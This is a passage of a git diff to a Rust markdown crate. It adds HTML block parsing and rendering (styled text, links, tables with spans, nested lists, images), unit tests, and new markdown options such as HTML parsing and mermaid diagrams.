text.contents.len()..new_text.len(), + mem::take(links), + )); + text.contents = SharedString::from(new_text); + } else { + let contents = contents.borrow().to_string(); + paragraph.push(HtmlParagraphChunk::Text(ParsedHtmlText { + source_range, + highlights: items_with_range(0..contents.len(), mem::take(highlights)), + links: items_with_range(0..contents.len(), mem::take(links)), + contents: contents.into(), + })); + } + } + NodeData::Element { name, attrs, .. } => { + if name.local == local_name!("img") { + if let Some(image) = extract_image(source_range, attrs) { + paragraph.push(HtmlParagraphChunk::Image(image)); + } + } else if name.local == local_name!("b") || name.local == local_name!("strong") { + highlights.push(HtmlHighlightStyle { + weight: FontWeight::BOLD, + ..Default::default() + }); + consume_paragraph(source_range, node, paragraph, highlights, links); + } else if name.local == local_name!("i") { + highlights.push(HtmlHighlightStyle { + italic: true, + ..Default::default() + }); + consume_paragraph(source_range, node, paragraph, highlights, links); + } else if name.local == local_name!("em") { + highlights.push(HtmlHighlightStyle { + oblique: true, + ..Default::default() + }); + consume_paragraph(source_range, node, paragraph, highlights, links); + } else if name.local == local_name!("del") { + highlights.push(HtmlHighlightStyle { + strikethrough: true, + ..Default::default() + }); + consume_paragraph(source_range, node, paragraph, highlights, links); + } else if name.local == local_name!("ins") { + highlights.push(HtmlHighlightStyle { + underline: true, + ..Default::default() + }); + consume_paragraph(source_range, node, paragraph, highlights, links); + } else if name.local == local_name!("a") { + if let Some(url) = attr_value(attrs, local_name!("href")) { + highlights.push(HtmlHighlightStyle { + link: true, + ..Default::default() + }); + links.push(url.into()); + } + consume_paragraph(source_range, node, paragraph, highlights, links); + } else { + consume_paragraph(source_range, node, paragraph, highlights, links); + } + } + _ => {} + } +} + +fn consume_paragraph( + source_range: Range, + node: &Node, + paragraph: &mut HtmlParagraph, + highlights: &mut Vec, + links: &mut Vec, +) { + for child in node.children.borrow().iter() { + parse_paragraph(source_range.clone(), child, paragraph, highlights, links); + } +} + +fn parse_table_row(source_range: Range, node: &Node) -> Option { + let mut columns = Vec::new(); + + if let NodeData::Element { name, .. } = &node.data { + if name.local != local_name!("tr") { + return None; + } + + for child in node.children.borrow().iter() { + if let Some(column) = parse_table_column(source_range.clone(), child) { + columns.push(column); + } + } + } + + if columns.is_empty() { + None + } else { + Some(ParsedHtmlTableRow { columns }) + } +} + +fn parse_table_column(source_range: Range, node: &Node) -> Option { + match &node.data { + NodeData::Element { name, attrs, .. } => { + if !matches!(name.local, local_name!("th") | local_name!("td")) { + return None; + } + + let mut children = HtmlParagraph::new(); + consume_paragraph( + source_range, + node, + &mut children, + &mut Vec::new(), + &mut Vec::new(), + ); + + let is_header = name.local == local_name!("th"); + + Some(ParsedHtmlTableColumn { + col_span: std::cmp::max( + attr_value(attrs, local_name!("colspan")) + .and_then(|span| span.parse().ok()) + .unwrap_or(1), + 1, + ), + row_span: std::cmp::max( + attr_value(attrs, local_name!("rowspan")) + .and_then(|span| span.parse().ok()) + .unwrap_or(1), + 1, + ), + is_header, + children, + alignment: attr_value(attrs, local_name!("align")) + .and_then(|align| match align.as_str() { + "left" => Some(Alignment::Left), + "center" => Some(Alignment::Center), + "right" => Some(Alignment::Right), + _ => None, + }) + .unwrap_or(if is_header { + Alignment::Center + } else { + Alignment::None + }), + }) + } + _ => None, + } +} + +fn consume_children( + source_range: Range, + node: &Node, + elements: &mut Vec, + context: &ParseHtmlNodeContext, +) { + for child in node.children.borrow().iter() { + parse_html_node(source_range.clone(), child, elements, context); + } +} + +fn attr_value(attrs: &RefCell>, name: LocalName) -> Option { + attrs.borrow().iter().find_map(|attr| { + if attr.name.local == name { + Some(attr.value.to_string()) + } else { + None + } + }) +} + +fn html_style_from_html_styles(styles: HashMap) -> Option { + let mut html_style = HtmlHighlightStyle::default(); + + if let Some(text_decoration) = styles.get("text-decoration") { + match text_decoration.to_lowercase().as_str() { + "underline" => { + html_style.underline = true; + } + "line-through" => { + html_style.strikethrough = true; + } + _ => {} + } + } + + if let Some(font_style) = styles.get("font-style") { + match font_style.to_lowercase().as_str() { + "italic" => { + html_style.italic = true; + } + "oblique" => { + html_style.oblique = true; + } + _ => {} + } + } + + if let Some(font_weight) = styles.get("font-weight") { + match font_weight.to_lowercase().as_str() { + "bold" => { + html_style.weight = FontWeight::BOLD; + } + "lighter" => { + html_style.weight = FontWeight::THIN; + } + _ => { + if let Ok(weight) = font_weight.parse::() { + html_style.weight = FontWeight(weight); + } + } + } + } + + if html_style != HtmlHighlightStyle::default() { + Some(html_style) + } else { + None + } +} + +fn extract_styles_from_attributes(attrs: &RefCell>) -> HashMap { + let mut styles = HashMap::new(); + + if let Some(style) = attr_value(attrs, local_name!("style")) { + for declaration in style.split(';') { + let mut parts = declaration.splitn(2, ':'); + if let Some((key, value)) = parts.next().zip(parts.next()) { + styles.insert(key.trim().to_lowercase(), value.trim().to_string()); + } + } + } + + styles +} + +fn extract_image(source_range: Range, attrs: &RefCell>) -> Option { + let src = attr_value(attrs, local_name!("src"))?; + + let mut image = HtmlImage::new(src, source_range); + + if let Some(alt) = attr_value(attrs, local_name!("alt")) { + image.set_alt_text(alt.into()); + } + + let styles = extract_styles_from_attributes(attrs); + + if let Some(width) = attr_value(attrs, local_name!("width")) + .or_else(|| styles.get("width").cloned()) + .and_then(|width| parse_html_element_dimension(&width)) + { + image.set_width(width); + } + + if let Some(height) = attr_value(attrs, local_name!("height")) + .or_else(|| styles.get("height").cloned()) + .and_then(|height| parse_html_element_dimension(&height)) + { + image.set_height(height); + } + + Some(image) +} + +fn extract_html_list( + node: &Node, + ordered: bool, + depth: u16, + source_range: Range, +) -> Option { + let mut items = Vec::with_capacity(node.children.borrow().len()); + + for (index, child) in node.children.borrow().iter().enumerate() { + if let NodeData::Element { name, .. } = &child.data { + if name.local != local_name!("li") { + continue; + } + + let mut content = Vec::new(); + consume_children( + source_range.clone(), + child, + &mut content, + &ParseHtmlNodeContext { + list_item_depth: depth + 1, + }, + ); + + if !content.is_empty() { + items.push(ParsedHtmlListItem { + source_range: source_range.clone(), + item_type: if ordered { + ParsedHtmlListItemType::Ordered(index as u64 + 1) + } else { + ParsedHtmlListItemType::Unordered + }, + content, + }); + } + } + } + + if items.is_empty() { + None + } else { + Some(ParsedHtmlList { + source_range, + depth, + ordered, + items, + }) + } +} + +fn parse_html_element_dimension(value: &str) -> Option { + if value.ends_with('%') { + value + .trim_end_matches('%') + .parse::() + .ok() + .map(|value| relative(value / 100.)) + } else { + value + .trim_end_matches("px") + .parse() + .ok() + .map(|value| px(value).into()) + } +} + +fn extract_html_blockquote( + node: &Node, + source_range: Range, +) -> Option { + let mut children = Vec::new(); + consume_children( + source_range.clone(), + node, + &mut children, + &ParseHtmlNodeContext::default(), + ); + + if children.is_empty() { + None + } else { + Some(ParsedHtmlBlockQuote { + children, + source_range, + }) + } +} + +fn extract_html_table(node: &Node, source_range: Range) -> Option { + let mut header_rows = Vec::new(); + let mut body_rows = Vec::new(); + let mut caption = None; + + for child in node.children.borrow().iter() { + if let NodeData::Element { name, .. } = &child.data { + if name.local == local_name!("caption") { + let mut paragraph = HtmlParagraph::new(); + parse_paragraph( + source_range.clone(), + child, + &mut paragraph, + &mut Vec::new(), + &mut Vec::new(), + ); + caption = Some(paragraph); + } + + if name.local == local_name!("thead") { + for row in child.children.borrow().iter() { + if let Some(row) = parse_table_row(source_range.clone(), row) { + header_rows.push(row); + } + } + } else if name.local == local_name!("tbody") { + for row in child.children.borrow().iter() { + if let Some(row) = parse_table_row(source_range.clone(), row) { + body_rows.push(row); + } + } + } + } + } + + if !header_rows.is_empty() || !body_rows.is_empty() { + Some(ParsedHtmlTable { + source_range, + body: body_rows, + header: header_rows, + caption, + }) + } else { + None + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn parses_html_styled_text() { + let parsed = parse_html_block( + "", + 0..79, + ) + .unwrap(); + + assert_eq!(parsed.children.len(), 1); + let ParsedHtmlElement::Paragraph(paragraph) = &parsed.children[0] else { + panic!("expected paragraph"); + }; + let HtmlParagraphChunk::Text(text) = ¶graph[0] else { + panic!("expected text chunk"); + }; + + assert_eq!(text.contents.as_ref(), "Some text strong link"); + assert_eq!( + text.highlights, + vec![ + ( + 10..16, + HtmlHighlightStyle { + weight: FontWeight::BOLD, + ..Default::default() + } + ), + ( + 17..21, + HtmlHighlightStyle { + link: true, + ..Default::default() + } + ) + ] + ); + assert_eq!( + text.links, + vec![(17..21, SharedString::from("https://example.com"))] + ); + } + + #[test] + fn parses_html_table_spans() { + let parsed = parse_html_block( + "
a
bc
", + 0..91, + ) + .unwrap(); + + let ParsedHtmlElement::Table(table) = &parsed.children[0] else { + panic!("expected table"); + }; + assert_eq!(table.body.len(), 2); + assert_eq!(table.body[0].columns[0].col_span, 2); + assert_eq!(table.body[1].columns.len(), 2); + } + + #[test] + fn parses_html_list_as_explicit_list_node() { + let parsed = parse_html_block( + "
  • parent
    • child
  • sibling
", + 0..64, + ) + .unwrap(); + + assert_eq!(parsed.children.len(), 1); + + let ParsedHtmlElement::List(list) = &parsed.children[0] else { + panic!("expected list"); + }; + + assert!(!list.ordered); + assert_eq!(list.depth, 1); + assert_eq!(list.items.len(), 2); + + let first_item = &list.items[0]; + let ParsedHtmlElement::Paragraph(paragraph) = &first_item.content[0] else { + panic!("expected first item paragraph"); + }; + let HtmlParagraphChunk::Text(text) = ¶graph[0] else { + panic!("expected first item text"); + }; + assert_eq!(text.contents.as_ref(), "parent"); + + let ParsedHtmlElement::List(nested_list) = &first_item.content[1] else { + panic!("expected nested list"); + }; + assert_eq!(nested_list.depth, 2); + assert_eq!(nested_list.items.len(), 1); + + let ParsedHtmlElement::Paragraph(nested_paragraph) = &nested_list.items[0].content[0] + else { + panic!("expected nested item paragraph"); + }; + let HtmlParagraphChunk::Text(nested_text) = &nested_paragraph[0] else { + panic!("expected nested item text"); + }; + assert_eq!(nested_text.contents.as_ref(), "child"); + + let second_item = &list.items[1]; + let ParsedHtmlElement::Paragraph(second_paragraph) = &second_item.content[0] else { + panic!("expected second item paragraph"); + }; + let HtmlParagraphChunk::Text(second_text) = &second_paragraph[0] else { + panic!("expected second item text"); + }; + assert_eq!(second_text.contents.as_ref(), "sibling"); + } +} diff --git a/crates/markdown/src/html/html_rendering.rs b/crates/markdown/src/html/html_rendering.rs new file mode 100644 index 0000000000000000000000000000000000000000..103e2a6accb7dce9bc429419aafd27cbdf5080ce --- /dev/null +++ b/crates/markdown/src/html/html_rendering.rs @@ -0,0 +1,614 @@ +use std::ops::Range; + +use gpui::{App, FontStyle, FontWeight, StrikethroughStyle, TextStyleRefinement, UnderlineStyle}; +use pulldown_cmark::Alignment; +use ui::prelude::*; + +use crate::html::html_parser::{ + HtmlHighlightStyle, HtmlImage, HtmlParagraph, HtmlParagraphChunk, ParsedHtmlBlock, + ParsedHtmlElement, ParsedHtmlList, ParsedHtmlListItemType, ParsedHtmlTable, ParsedHtmlTableRow, + ParsedHtmlText, +}; +use crate::{MarkdownElement, MarkdownElementBuilder}; + +pub(crate) struct HtmlSourceAllocator { + source_range: Range, + next_source_index: usize, +} + +impl HtmlSourceAllocator { + pub(crate) fn new(source_range: Range) -> Self { + Self { + next_source_index: source_range.start, + source_range, + } + } + + pub(crate) fn allocate(&mut self, requested_len: usize) -> Range { + let remaining = self.source_range.end.saturating_sub(self.next_source_index); + let len = requested_len.min(remaining); + let start = self.next_source_index; + let end = start + len; + self.next_source_index = end; + start..end + } +} + +impl MarkdownElement { + pub(crate) fn render_html_block( + &self, + block: &ParsedHtmlBlock, + builder: &mut MarkdownElementBuilder, + markdown_end: usize, + cx: &mut App, + ) { + let mut source_allocator = HtmlSourceAllocator::new(block.source_range.clone()); + self.render_html_elements( + &block.children, + &mut source_allocator, + builder, + markdown_end, + cx, + ); + } + + fn render_html_elements( + &self, + elements: &[ParsedHtmlElement], + source_allocator: &mut HtmlSourceAllocator, + builder: &mut MarkdownElementBuilder, + markdown_end: usize, + cx: &mut App, + ) { + for element in elements { + self.render_html_element(element, source_allocator, builder, markdown_end, cx); + } + } + + fn render_html_element( + &self, + element: &ParsedHtmlElement, + source_allocator: &mut HtmlSourceAllocator, + builder: &mut MarkdownElementBuilder, + markdown_end: usize, + cx: &mut App, + ) { + let Some(source_range) = element.source_range() else { + return; + }; + + match element { + ParsedHtmlElement::Paragraph(paragraph) => { + self.push_markdown_paragraph(builder, &source_range, markdown_end); + self.render_html_paragraph(paragraph, source_allocator, builder, cx, markdown_end); + builder.pop_div(); + } + ParsedHtmlElement::Heading(heading) => { + self.push_markdown_heading( + builder, + heading.level, + &heading.source_range, + markdown_end, + ); + self.render_html_paragraph( + &heading.contents, + source_allocator, + builder, + cx, + markdown_end, + ); + self.pop_markdown_heading(builder); + } + ParsedHtmlElement::List(list) => { + self.render_html_list(list, source_allocator, builder, markdown_end, cx); + } + ParsedHtmlElement::BlockQuote(block_quote) => { + self.push_markdown_block_quote(builder, &block_quote.source_range, markdown_end); + self.render_html_elements( + &block_quote.children, + source_allocator, + builder, + markdown_end, + cx, + ); + self.pop_markdown_block_quote(builder); + } + ParsedHtmlElement::Table(table) => { + self.render_html_table(table, source_allocator, builder, markdown_end, cx); + } + ParsedHtmlElement::Image(image) => { + self.render_html_image(image, builder); + } + } + } + + fn render_html_list( + &self, + list: &ParsedHtmlList, + source_allocator: &mut HtmlSourceAllocator, + builder: &mut MarkdownElementBuilder, + markdown_end: usize, + cx: &mut App, + ) { + builder.push_div(div().pl_2p5(), &list.source_range, markdown_end); + + for list_item in &list.items { + let bullet = match list_item.item_type { + ParsedHtmlListItemType::Ordered(order) => html_list_item_prefix( + order as usize, + list.ordered, + list.depth.saturating_sub(1) as usize, + ), + ParsedHtmlListItemType::Unordered => { + html_list_item_prefix(1, false, list.depth.saturating_sub(1) as usize) + } + }; + + self.push_markdown_list_item( + builder, + div().child(bullet).into_any_element(), + &list_item.source_range, + markdown_end, + ); + self.render_html_elements( + &list_item.content, + source_allocator, + builder, + markdown_end, + cx, + ); + self.pop_markdown_list_item(builder); + } + + builder.pop_div(); + } + + fn render_html_table( + &self, + table: &ParsedHtmlTable, + source_allocator: &mut HtmlSourceAllocator, + builder: &mut MarkdownElementBuilder, + markdown_end: usize, + cx: &mut App, + ) { + if let Some(caption) = &table.caption { + builder.push_div( + div().when(!self.style.height_is_multiple_of_line_height, |el| { + el.mb_2().line_height(rems(1.3)) + }), + &table.source_range, + markdown_end, + ); + self.render_html_paragraph(caption, source_allocator, builder, cx, markdown_end); + builder.pop_div(); + } + + let actual_header_column_count = html_table_columns_count(&table.header); + let actual_body_column_count = html_table_columns_count(&table.body); + let max_column_count = actual_header_column_count.max(actual_body_column_count); + + if max_column_count == 0 { + return; + } + + let total_rows = table.header.len() + table.body.len(); + let mut grid_occupied = vec![vec![false; max_column_count]; total_rows]; + + builder.push_div( + div() + .id(("html-table", table.source_range.start)) + .grid() + .grid_cols(max_column_count as u16) + .when(self.style.table_columns_min_size, |this| { + this.grid_cols_min_content(max_column_count as u16) + }) + .when(!self.style.table_columns_min_size, |this| { + this.grid_cols(max_column_count as u16) + }) + .w_full() + .mb_2() + .border(px(1.5)) + .border_color(cx.theme().colors().border) + .rounded_sm() + .overflow_hidden(), + &table.source_range, + markdown_end, + ); + + for (row_index, row) in table.header.iter().chain(table.body.iter()).enumerate() { + let mut column_index = 0; + + for cell in &row.columns { + while column_index < max_column_count && grid_occupied[row_index][column_index] { + column_index += 1; + } + + if column_index >= max_column_count { + break; + } + + let max_span = max_column_count.saturating_sub(column_index); + let mut cell_div = div() + .col_span(cell.col_span.min(max_span) as u16) + .row_span(cell.row_span.min(total_rows - row_index) as u16) + .when(column_index > 0, |this| this.border_l_1()) + .when(row_index > 0, |this| this.border_t_1()) + .border_color(cx.theme().colors().border) + .px_2() + .py_1() + .when(cell.is_header, |this| { + this.bg(cx.theme().colors().title_bar_background) + }) + .when(!cell.is_header && row_index % 2 == 1, |this| { + this.bg(cx.theme().colors().panel_background) + }); + + cell_div = match cell.alignment { + Alignment::Center => cell_div.items_center(), + Alignment::Right => cell_div.items_end(), + _ => cell_div, + }; + + builder.push_div(cell_div, &table.source_range, markdown_end); + self.render_html_paragraph( + &cell.children, + source_allocator, + builder, + cx, + markdown_end, + ); + builder.pop_div(); + + for row_offset in 0..cell.row_span { + for column_offset in 0..cell.col_span { + if row_index + row_offset < total_rows + && column_index + column_offset < max_column_count + { + grid_occupied[row_index + row_offset][column_index + column_offset] = + true; + } + } + } + + column_index += cell.col_span; + } + + while column_index < max_column_count { + if grid_occupied[row_index][column_index] { + column_index += 1; + continue; + } + + builder.push_div( + div() + .when(column_index > 0, |this| this.border_l_1()) + .when(row_index > 0, |this| this.border_t_1()) + .border_color(cx.theme().colors().border) + .when(row_index % 2 == 1, |this| { + this.bg(cx.theme().colors().panel_background) + }), + &table.source_range, + markdown_end, + ); + builder.pop_div(); + column_index += 1; + } + } + + builder.pop_div(); + } + + fn render_html_paragraph( + &self, + paragraph: &HtmlParagraph, + source_allocator: &mut HtmlSourceAllocator, + builder: &mut MarkdownElementBuilder, + cx: &mut App, + _markdown_end: usize, + ) { + for chunk in paragraph { + match chunk { + HtmlParagraphChunk::Text(text) => { + self.render_html_text(text, source_allocator, builder, cx); + } + HtmlParagraphChunk::Image(image) => { + self.render_html_image(image, builder); + } + } + } + } + + fn render_html_text( + &self, + text: &ParsedHtmlText, + source_allocator: &mut HtmlSourceAllocator, + builder: &mut MarkdownElementBuilder, + cx: &mut App, + ) { + let text_contents = text.contents.as_ref(); + if text_contents.is_empty() { + return; + } + + let allocated_range = source_allocator.allocate(text_contents.len()); + let allocated_len = allocated_range.end.saturating_sub(allocated_range.start); + + let mut boundaries = vec![0, text_contents.len()]; + for (range, _) in &text.highlights { + boundaries.push(range.start); + boundaries.push(range.end); + } + for (range, _) in &text.links { + boundaries.push(range.start); + boundaries.push(range.end); + } + boundaries.sort_unstable(); + boundaries.dedup(); + + for segment in boundaries.windows(2) { + let start = segment[0]; + let end = segment[1]; + if start >= end { + continue; + } + + let source_start = allocated_range.start + start.min(allocated_len); + let source_end = allocated_range.start + end.min(allocated_len); + if source_start >= source_end { + continue; + } + + let mut refinement = TextStyleRefinement::default(); + let mut has_refinement = false; + + for (highlight_range, style) in &text.highlights { + if highlight_range.start < end && highlight_range.end > start { + apply_html_highlight_style(&mut refinement, style); + has_refinement = true; + } + } + + let link = text.links.iter().find_map(|(link_range, link)| { + if link_range.start < end && link_range.end > start { + Some(link.clone()) + } else { + None + } + }); + + if let Some(link) = link.as_ref() { + builder.push_link(link.clone(), source_start..source_end); + let link_style = self + .style + .link_callback + .as_ref() + .and_then(|callback| callback(link.as_ref(), cx)) + .unwrap_or_else(|| self.style.link.clone()); + builder.push_text_style(link_style); + } + + if has_refinement { + builder.push_text_style(refinement); + } + + builder.push_text(&text_contents[start..end], source_start..source_end); + + if has_refinement { + builder.pop_text_style(); + } + + if link.is_some() { + builder.pop_text_style(); + } + } + } + + fn render_html_image(&self, image: &HtmlImage, builder: &mut MarkdownElementBuilder) { + let Some(source) = self + .image_resolver + .as_ref() + .and_then(|resolve| resolve(image.dest_url.as_ref())) + else { + return; + }; + + self.push_markdown_image( + builder, + &image.source_range, + source, + image.width, + image.height, + ); + } +} + +fn apply_html_highlight_style(refinement: &mut TextStyleRefinement, style: &HtmlHighlightStyle) { + if style.weight != FontWeight::default() { + refinement.font_weight = Some(style.weight); + } + + if style.oblique { + refinement.font_style = Some(FontStyle::Oblique); + } else if style.italic { + refinement.font_style = Some(FontStyle::Italic); + } + + if style.underline { + refinement.underline = Some(UnderlineStyle { + thickness: px(1.), + color: None, + ..Default::default() + }); + } + + if style.strikethrough { + refinement.strikethrough = Some(StrikethroughStyle { + thickness: px(1.), + color: None, + }); + } +} + +fn html_list_item_prefix(order: usize, ordered: bool, depth: usize) -> String { + let index = order.saturating_sub(1); + const NUMBERED_PREFIXES_1: &str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; + const NUMBERED_PREFIXES_2: &str = "abcdefghijklmnopqrstuvwxyz"; + const BULLETS: [&str; 5] = ["•", "◦", "▪", "‣", "⁃"]; + + if ordered { + match depth { + 0 => format!("{}. ", order), + 1 => format!( + "{}. ", + NUMBERED_PREFIXES_1 + .chars() + .nth(index % NUMBERED_PREFIXES_1.len()) + .unwrap() + ), + _ => format!( + "{}. ", + NUMBERED_PREFIXES_2 + .chars() + .nth(index % NUMBERED_PREFIXES_2.len()) + .unwrap() + ), + } + } else { + let depth = depth.min(BULLETS.len() - 1); + format!("{} ", BULLETS[depth]) + } +} + +fn html_table_columns_count(rows: &[ParsedHtmlTableRow]) -> usize { + let mut actual_column_count = 0; + for row in rows { + actual_column_count = actual_column_count.max( + row.columns + .iter() + .map(|column| column.col_span) + .sum::(), + ); + } + actual_column_count +} + +#[cfg(test)] +mod tests { + use gpui::{TestAppContext, size}; + use ui::prelude::*; + + use crate::{ + CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownOptions, + MarkdownStyle, + }; + + fn ensure_theme_initialized(cx: &mut TestAppContext) { + cx.update(|cx| { + if !cx.has_global::() { + settings::init(cx); + } + if !cx.has_global::() { + theme_settings::init(theme::LoadThemes::JustBase, cx); + } + }); + } + + fn render_markdown_text(markdown: &str, cx: &mut TestAppContext) -> crate::RenderedText { + struct TestWindow; + + impl Render for TestWindow { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + div() + } + } + + ensure_theme_initialized(cx); + + let (_, cx) = cx.add_window_view(|_, _| TestWindow); + let markdown = cx.new(|cx| Markdown::new(markdown.to_string().into(), None, None, cx)); + cx.run_until_parked(); + let (rendered, _) = cx.draw( + Default::default(), + size(px(600.0), px(600.0)), + |_window, _cx| { + MarkdownElement::new(markdown, MarkdownStyle::default()).code_block_renderer( + CodeBlockRenderer::Default { + copy_button_visibility: CopyButtonVisibility::Hidden, + border: false, + }, + ) + }, + ); + rendered.text + } + + #[gpui::test] + fn test_html_block_rendering_smoke(cx: &mut TestAppContext) { + let rendered = render_markdown_text( + "

Hello

world

  • item
", + cx, + ); + + let rendered_lines = rendered + .lines + .iter() + .map(|line| line.layout.wrapped_text()) + .collect::>(); + + assert_eq!( + rendered_lines.concat().replace('\n', ""), + "

Hello

world

  • item
" + ); + } + + #[gpui::test] + fn test_html_block_rendering_can_be_enabled(cx: &mut TestAppContext) { + struct TestWindow; + + impl Render for TestWindow { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + div() + } + } + + ensure_theme_initialized(cx); + + let (_, cx) = cx.add_window_view(|_, _| TestWindow); + let markdown = cx.new(|cx| { + Markdown::new_with_options( + "

Hello

world

  • item
".into(), + None, + None, + MarkdownOptions { + parse_html: true, + ..Default::default() + }, + cx, + ) + }); + cx.run_until_parked(); + let (rendered, _) = cx.draw( + Default::default(), + size(px(600.0), px(600.0)), + |_window, _cx| { + MarkdownElement::new(markdown, MarkdownStyle::default()).code_block_renderer( + CodeBlockRenderer::Default { + copy_button_visibility: CopyButtonVisibility::Hidden, + border: false, + }, + ) + }, + ); + + let rendered_lines = rendered + .text + .lines + .iter() + .map(|line| line.layout.wrapped_text()) + .collect::>(); + + assert_eq!(rendered_lines[0], "Hello"); + assert_eq!(rendered_lines[1], "world"); + assert!(rendered_lines.iter().any(|line| line.contains("item"))); + } +} diff --git a/crates/markdown/src/markdown.rs b/crates/markdown/src/markdown.rs index 1cd19ffb8f7cfa16ab1aa95af9425690aba78707..247c082d223005a7e0bd6d57696751ce76cc4d86 100644 --- a/crates/markdown/src/markdown.rs +++ b/crates/markdown/src/markdown.rs @@ -1,3 +1,5 @@ +pub mod html; +mod mermaid; pub mod parser; mod path_range; @@ -7,14 +9,19 @@ use gpui::EdgesRefinement; use gpui::HitboxBehavior; use gpui::UnderlineStyle; use language::LanguageName; + use log::Level; +use mermaid::{ + MermaidState, ParsedMarkdownMermaidDiagram, extract_mermaid_diagrams, render_mermaid_diagram, +}; pub use path_range::{LineCol, PathWithRange}; use settings::Settings as _; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::Checkbox; use ui::CopyButton; use std::borrow::Cow; +use std::collections::BTreeMap; use std::iter; use std::mem; use std::ops::Range; @@ -27,13 +34,16 @@ use collections::{HashMap, HashSet}; use gpui::{ AnyElement, App, BorderStyle, Bounds, ClipboardItem, CursorStyle, DispatchPhase, Edges, Entity, FocusHandle, Focusable, FontStyle, FontWeight, GlobalElementId, Hitbox, Hsla, Image, - ImageFormat, KeyContext, Length, MouseButton, MouseDownEvent, MouseEvent, MouseMoveEvent, - MouseUpEvent, Point, ScrollHandle, Stateful, StrikethroughStyle, StyleRefinement, StyledText, - Task, TextLayout, TextRun, TextStyle, TextStyleRefinement, actions, img, point, quad, + ImageFormat, ImageSource, KeyContext, Length, MouseButton, MouseDownEvent, MouseEvent, + MouseMoveEvent, MouseUpEvent, Point, ScrollHandle, Stateful, StrikethroughStyle, + StyleRefinement, StyledText, Task, TextLayout, TextRun, TextStyle, TextStyleRefinement, + actions, img, point, quad, }; use language::{CharClassifier, Language, LanguageRegistry, Rope}; use parser::CodeBlockMetadata; -use parser::{MarkdownEvent, MarkdownTag, MarkdownTagEnd, parse_links_only, parse_markdown}; +use parser::{ + MarkdownEvent, MarkdownTag, MarkdownTagEnd, parse_links_only, parse_markdown_with_options, +}; use pulldown_cmark::Alignment; use sum_tree::TreeMap; use theme::SyntaxTheme; @@ -45,7 +55,8 @@ use crate::parser::CodeBlockKind; /// A callback function that can be used to customize the style of links based on the destination URL. /// If the callback returns `None`, the default link style will be used. type LinkStyleCallback = Rc Option>; - +type SourceClickCallback = Box bool>; +type CheckboxToggleCallback = Rc, bool, &mut Window, &mut App)>; /// Defines custom style refinements for each heading level (H1-H6) #[derive(Clone, Default)] pub struct HeadingLevelStyles { @@ -143,6 +154,8 @@ impl MarkdownStyle { base_text_style: text_style.clone(), syntax: cx.theme().syntax().clone(), selection_background_color: colors.element_selection_background, + rule_color: colors.border, + block_quote_border_color: colors.border, code_block_overflow_x_scroll: true, heading_level_styles: Some(HeadingLevelStyles { h1: Some(TextStyleRefinement { @@ -237,6 +250,7 @@ pub struct Markdown { selection: Selection, pressed_link: Option, autoscroll_request: Option, + active_root_block: Option, parsed_markdown: ParsedMarkdown, images_by_source_offset: HashMap>, should_reparse: bool, @@ -244,20 +258,32 @@ pub struct Markdown { focus_handle: FocusHandle, language_registry: Option>, fallback_code_block_language: Option, - options: Options, + options: MarkdownOptions, + mermaid_state: MermaidState, copied_code_blocks: HashSet, - code_block_scroll_handles: HashMap, + code_block_scroll_handles: BTreeMap, context_menu_selected_text: Option, + search_highlights: Vec>, + active_search_highlight: Option, } -struct Options { - parse_links_only: bool, +#[derive(Clone, Copy, Default)] +pub struct MarkdownOptions { + pub parse_links_only: bool, + pub parse_html: bool, + pub render_mermaid_diagrams: bool, +} + +#[derive(Clone, Copy, PartialEq, Eq)] +pub enum CopyButtonVisibility { + Hidden, + AlwaysVisible, + VisibleOnHover, } pub enum CodeBlockRenderer { Default { - copy_button: bool, - copy_button_on_hover: bool, + copy_button_visibility: CopyButtonVisibility, border: bool, }, Custom { @@ -292,12 +318,100 @@ actions!( ] ); +enum EscapeAction { + PassThrough, + Nbsp(usize), + DoubleNewline, + PrefixBackslash, +} + +impl EscapeAction { + fn output_len(&self) -> usize { + match self { + Self::PassThrough => 1, + Self::Nbsp(count) => count * '\u{00A0}'.len_utf8(), + Self::DoubleNewline => 2, + Self::PrefixBackslash => 2, + } + } + + fn write_to(&self, c: char, output: &mut String) { + match self { + Self::PassThrough => output.push(c), + Self::Nbsp(count) => { + for _ in 0..*count { + output.push('\u{00A0}'); + } + } + Self::DoubleNewline => { + output.push('\n'); + output.push('\n'); + } + Self::PrefixBackslash => { + // '\\' is a single backslash in Rust, e.g. '|' -> '\|' + output.push('\\'); + output.push(c); + } + } + } +} + +// Valid to operate on raw bytes since multi-byte UTF-8 +// sequences never contain ASCII-range bytes. +struct MarkdownEscaper { + in_leading_whitespace: bool, +} + +impl MarkdownEscaper { + const TAB_SIZE: usize = 4; + + fn new() -> Self { + Self { + in_leading_whitespace: true, + } + } + + fn next(&mut self, byte: u8) -> EscapeAction { + let action = if self.in_leading_whitespace && byte == b'\t' { + EscapeAction::Nbsp(Self::TAB_SIZE) + } else if self.in_leading_whitespace && byte == b' ' { + EscapeAction::Nbsp(1) + } else if byte == b'\n' { + EscapeAction::DoubleNewline + } else if byte.is_ascii_punctuation() { + EscapeAction::PrefixBackslash + } else { + EscapeAction::PassThrough + }; + + self.in_leading_whitespace = + byte == b'\n' || (self.in_leading_whitespace && (byte == b' ' || byte == b'\t')); + action + } +} + impl Markdown { pub fn new( source: SharedString, language_registry: Option>, fallback_code_block_language: Option, cx: &mut Context, + ) -> Self { + Self::new_with_options( + source, + language_registry, + fallback_code_block_language, + MarkdownOptions::default(), + cx, + ) + } + + pub fn new_with_options( + source: SharedString, + language_registry: Option>, + fallback_code_block_language: Option, + options: MarkdownOptions, + cx: &mut Context, ) -> Self { let focus_handle = cx.focus_handle(); let mut this = Self { @@ -305,6 +419,7 @@ impl Markdown { selection: Selection::default(), pressed_link: None, autoscroll_request: None, + active_root_block: None, should_reparse: false, images_by_source_offset: Default::default(), parsed_markdown: ParsedMarkdown::default(), @@ -312,40 +427,29 @@ impl Markdown { focus_handle, language_registry, fallback_code_block_language, - options: Options { - parse_links_only: false, - }, + options, + mermaid_state: MermaidState::default(), copied_code_blocks: HashSet::default(), - code_block_scroll_handles: HashMap::default(), + code_block_scroll_handles: BTreeMap::default(), context_menu_selected_text: None, + search_highlights: Vec::new(), + active_search_highlight: None, }; this.parse(cx); this } pub fn new_text(source: SharedString, cx: &mut Context) -> Self { - let focus_handle = 